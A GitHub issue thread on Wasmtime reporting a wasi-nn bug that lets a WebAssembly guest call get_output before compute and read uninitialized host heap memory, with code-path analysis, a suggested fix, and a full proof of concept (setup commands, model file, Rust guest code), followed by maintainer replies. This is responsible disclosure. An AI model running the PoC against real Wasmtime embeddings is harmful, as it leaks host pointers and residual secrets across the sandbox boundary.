karalabe opened issue #14437:
This was a CVE submitted but deemed in a not-yet-supported module, and was asked to publish it here.
Summary
Wasmtime's wasi-nn implementation (preview1/WITX ABI, OpenVINO backend) allows a WebAssembly guest to call
get_outputon an execution context before ever callingcompute. The call returnsnn_errno::successand copies the OpenVINO output tensor into guest linear memory — but that tensor was allocated (as ordinary, uninitialized host heap memory) when the execution context was created and has never been written by any inference. The guest therefore receives leftover host process heap memory across the WebAssembly sandbox boundary. In embeddings that run untrusted guests with wasi-nn enabled, this discloses live host pointers (ASLR defeat) and residual sensitive data from prior host heap activity. On Linux the primitive is deterministic; on macOS it is probabilistic (the allocator returns freed pages to the kernel more aggressively, so reads sometimes come back as zeros).Details
Affected component:
wasmtime-wasi-nn, WITX ("preview1-style") APIwasi_ephemeral_nn.get_output, OpenVINO backend, CPU device, static output shapes.Verified versions: wasmtime
main@11eac9de8693e1a69f86815d1a58918edd5c1785(2026-09-26, reports itself as 50.0.0-dev),openvinocrate 0.11.0, OpenVINO runtime 2026.4.0 (tag2026.4.0, commit99c81491cc3). The implicated code paths are long-standing; both macOS arm64 and Linux arm64 were tested (x86_64 Linux uses the same plugin sources).The vulnerability is a missing state check across four layers; each layer assumes the one below it enforces ordering, and none does:
Wasmtime, WITX host call —
crates/wasi-nn/src/witx.rs:216-241.get_outputfetches the output tensor from the execution context and copies it into guest memory (destination[..tensor.data.len()].copy_from_slice(&tensor.data), line 235). There is no record of whethercomputewas ever invoked on the context, and no error is raised. It returnssuccessplus the byte count.Wasmtime, OpenVINO backend —
crates/wasi-nn/src/backend/openvino.rs.init_execution_contextcreates theopenvino::InferRequest(lines 80-86).get_output(lines 178-196) callsself.0.get_output_tensor_by_index(i)andoutput_name.get_raw_data()?.to_vec(), again with no compute-state check.openvino-rs bindings —
src/request.rs:78-86(get_output_tensor_by_index) is a thin wrapper over the C API; it adds no checks.OpenVINO runtime (CPU plugin) — at tag
2026.4.0:
src/plugins/intel_cpu/src/infer_request.cpp:66-75: theInferRequestconstructor allocates all static-shape input and output tensors up front (init_tensor→ov::make_tensor(model_prec, tensor_shape)at line 577) — before the firstinfer().src/inference/src/dev/make_tensor.cpp:311-319and:373-379: allocation goes throughAllocator::allocate(byte_size);initialize_elementsonly value-constructselement::stringelements. Numeric element storage is left completely uninitialized.src/core/src/runtime/allocator.cpp:11-29: the default allocator is::operator new(bytes)(orposix_memalign), which never zeroes.src/inference/src/dev/isync_infer_request.cpp:216-219:get_tensorsimply returns the tensor pointer — no lazy allocation, no state validation.- No code in the constructor or pre-
infer()path zeroes output tensors (the plugin's onlynullify()call sites concern input edges for zero-dim workarounds and state buffers:graph.cpp:866-872,memory_state.cpp:146-215).Net effect:
load→init_execution_context→get_output(0, ...)yields whatever bytes the host allocator happened to place in the output tensor's storage.Because the bytes come from the host allocator's recycled chunks, their content depends on prior heap activity of the host process. Observed in practice:
- fragments of the wasmtime host binary's own Rust symbol strings (e.g.
_RINvNtNtCsg9AFU4YgWuS_3std3sys9backtrac…),- arrays of live host pointers (Linux:
0xaaaaf5369480heap,0xffffb27910c0mmap regions; macOS:0x0000000b…/0x0000000c…heap),- a controlled 16-byte marker the host process had written into freed heap chunks (proof that arbitrary residual data is exposed — see the seeded variant in the PoC).
Scope notes:
- Only the WITX/preview1-style ABI is affected. The preview2
wasi:nn/inferenceworld implemented incrates/wasi-nn/src/wit.rs:243-259is compute-only (outputs are produced bycompute_with_io); it exposes no standaloneget_output.- Reproduced with the CPU plugin and static output shapes. For dynamic output shapes the CPU plugin defers allocation (
OutputControlBlock/MemoryBlockWithReuseininfer_request.cpp:518-581, via oneDNN's aligned malloc — also uninitialized), so the trigger conditions may differ; not investigated in depth.- Whether a given read returns stale data or zeros is allocator-dependent (Linux glibc recycles chunk contents deterministically; macOS
magazine_mallocmarks bulk freesMADV_FREE, so reclaimed pages read as zeros some fraction of the time). Zero results must not be mistaken for safety.Suggested fix: track per-execution-context state in wasmtime and fail
get_output(e.g.nn_errno::runtime_error/invalid_argument) untilcomputehas completed successfully at least once. Defense in depth: zero-initialize numeric tensor storage in OpenVINO's allocator (performance trade-off), or have wasmtime refuse to return tensor data the backend has not written.PoC
Everything needed is inline below. Directory layout to create:
wasmtime/ # git clone of wasmtime (also builds the CLI) poc/ model.xml model.bin guest/Cargo.toml guest/src/main.rs # basic PoC, runs under the plain wasmtime CLI guest/src/bin/seeded.rs # seeded variant, runs under poc/host host/Cargo.toml # custom embedding runner with a heap-spray hook host/src/main.rsTested on macOS 26.6.2 (arm64) and Debian trixie (arm64, Docker); x86_64 Linux works the same way.
Step 1 — install the OpenVINO runtime (2026.4.0) via pip and create the unversioned soname symlinks that
openvino-finderexpects:python3 -m venv venv && venv/bin/pip install openvino OVLIBS=$(dirname $(find venv -name 'libopenvino_c.*' | head -1)) for f in libopenvino_c libopenvino libopenvino_ir_frontend; do ln -sf $(ls $OVLIBS/$f.*.* | head -1) $OVLIBS/$f.so # use .dylib on macOS doneStep 2 — build wasmtime (wasi-nn is on by default) and add the guest target:
git clone https://github.com/bytecodealliance/wasmtime (cd wasmtime && cargo build --release) rustup target add wasm32-wasip1Step 3 — model files.
poc/model.xml(minimal static-shape graph; f32[1,1024]output = 4096 bytes):<?xml version="1.0"?> <net name="minimal-static" version="11"> <layers> <layer id="0" name="input" type="Parameter" version="opset1"> <data shape="1,1024" element_type="f32"/> <output><port id="0" precision="FP32"><dim>1</dim><dim>1024</dim></port></output> </layer> <layer id="1" name="relu" type="ReLU" version="opset1"> <input><port id="0" precision="FP32"><dim>1</dim><dim>1024</dim></port></input> <output><port id="1" precision="FP32"><dim>1</dim><dim>1024</dim></port></output> </layer> <layer id="2" name="output" type="Result" version="opset1"> <input><port id="0" precision="FP32"><dim>1</dim><dim>1024</dim></port></input> </layer> </layers> <edges> <edge from-layer="0" from-port="0" to-layer="1" to-port="0"/> <edge from-layer="1" from-port="1" to-layer="2" to-port="0"/> </edges> </net>
poc/model.bin(weights, unused by this graph):printf '\0\0\0\0' > poc/model.binStep 4 — the basic guest.
poc/guest/Cargo.toml:[package] name = "guest" version = "0.1.0" edition = "2021" [dependencies] wasi-nn = "0.6"
poc/guest/src/main.rs— the whole attack is: do not callcompute:use wasi_nn::{ExecutionTarget, GraphBuilder, GraphEncoding, TensorType}; const MARKER: &[u8; 16] = b"HOSTSECRET_C0DE!"; // only used by the seeded variant fn main() { let xml = include_bytes!("../../model.xml"); let bin = include_bytes!("../../model.bin"); let graph = GraphBuilder::new(GraphEncoding::Openvino, ExecutionTarget::CPU) .build_from_bytes([xml.as_slice(), bin.as_slice()]).unwrap(); let mut ctx = graph.init_execution_context().unwrap(); // No set_input, no compute — straight to get_output. let mut buf = vec![0u8; 1 << 20]; let n = ctx.get_output(0, &mut buf).unwrap(); // returns Ok(4096) report("BEFORE compute", &buf[..n]); // Contrast: defined output after a real inference (ReLU(-1) = 0). let input = vec![-1.0f32; 1024]; ctx.set_input(0, TensorType::F32, &[1, 1024], &input).unwrap(); ctx.compute().unwrap(); let n = ctx.get_output(0, &mut buf).unwrap(); report("AFTER compute ", &buf[..n]); } fn report(label: &str, out: &[u8]) { let nz = out.iter().filter(|&&b| b != 0).count(); println!("[{label}] {} bytes, {nz} non-zero", out.len()); let hits: Vec<usize> = out.windows(MARKER.len()).enumerate() .filter_map(|(i, w)| (w == MARKER).then_some(i)).take(4).collect(); if !hits.is_empty() { println!("[{label}] !!! HOST MARKER at offsets {hits:?}"); } print!("[{label}] hex[0..64]:"); for b in &out[..64.min(out.len())] { print!(" {b:02x}"); } println!(); }Step 5 — build and run (Linux):
(cd poc/guest && cargo build --release --target wasm32-wasip1) LD_LIBRARY_PATH=$OVLIBS wasmtime/target/release/wasmtime run --wasi nn \ poc/guest/target/wasm32-wasip1/release/guest.wasmObserved on Linux (very first run, unmodified CLI, no heap
[message truncated]
bjorn3 commented on issue #14437:
No unsafe code is used in wasi-nn for pytorch, openvino and onnx aside from implementing
SendandSyncfor some types, so if this indeed leaks host memory, that means these crates are unsound and the vulnerability is on their side. For winml some unsafe code is used. Haven't looked if in that case wasi-nn or winml is to blame.
alexcrichton commented on issue #14437:
cc @jlb6740 and @rahulchaphalkar -- y'all are likely interested in this one
alexcrichton added the wasi-nn label to Issue #14437.
shleder commented on issue #14437:
Host memory disclosure prior to execution is a critical boundary violation for untrusted guest execution.
Whenever an FFI or host function allocates uninitialized host memory buffers and exposes them to guest address spaces before execution completion, residual host memory (including previously freed tokens or keys) leaks into guest memory. Zero-initializing output buffers or strictly enforcing state transitions before output buffers can be retrieved is essential for fail-closed isolation.
Disclaimer: I am the author/maintainer of Vetto, an unprivileged process sandbox runtime for AI coding agents.
rahulchaphalkar commented on issue #14437:
I'll take a look at this, thanks
alexcrichton added the bug label to Issue #14437.
Last updated: Oct 11 2026 at 04:10 UTC